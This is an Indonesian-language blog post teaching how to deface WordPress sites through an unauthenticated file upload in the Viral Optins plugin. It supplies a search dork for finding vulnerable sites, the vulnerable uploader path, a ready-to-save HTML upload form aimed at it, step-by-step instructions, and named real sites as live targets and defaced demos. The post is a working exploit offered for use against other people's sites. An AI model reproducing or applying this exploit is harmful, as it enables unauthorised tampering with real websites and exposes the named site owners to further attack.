Kali ini gua akan share Deface Menggunakan Metode Viral_Optins v2 , langung saja ke tkp
Dork : "inurl:/wp-content/plugins/viral-optins/"
Exploit : /wp-content/plugins/viral-optins/api/uploader/file-uploader.php
1. Live Target gua http://myplaypost.com
2. klik saja sitenya
4. kalo sudah kaya gitu kita masuk ke CSRF untuk upload script kita , ini gua bagi CSRF nya
<font color="red"><center>Simpan dengan ext .html + ganti TARGET yg warna merah itu , sama target mu , contoh
<img style="width:400px;" src="http://i.imgur.com/WqFUd7q.jpg">
<h1 align="center">CowoKerensTeam</h1></font>
<br>
<body background="black"><style>body {background:black}
input,submit {border:1px;solid green;color:green}</style><center>
<form method="POST" action="\Target/" enctype="multipart/form-data" > <input type="file" name="Filedata"></center><br>
<center> <input type="submit" name="Submit" value="Hajar !">
</form></body>
http://myplaypost.com/wp-content/plugins/viral-optins/api/uploader/file-uploader.php < masukan ke CSRF
jangan lupa juga buat di save klo udh masukin sitenya .
5. lalu kita masuk ke CSRF kita tadi , klik 2x . habis itu pilih BROWSE + upload script mu hanya bisa upload jenis .TXT saja , klo sudah klik HAJAR !
6. klo berhasil nanti akan blank lagi tampilannya
7. mau tau letak hasil defacean kita ?
www.site.com//wp-content/uploads/tahun/bulan/index.txt < inget , isi sama tahun + bulan yang lu pas upload
Demo :
http://migmar.com/wp/wp-content/uploads/2016/09/index.txt
http://myplaypost.com/wp-content/uploads/2016/09/index.txt
0 Response to "Deface Menggunakan Metode Viral_Optins v2 "
Post a Comment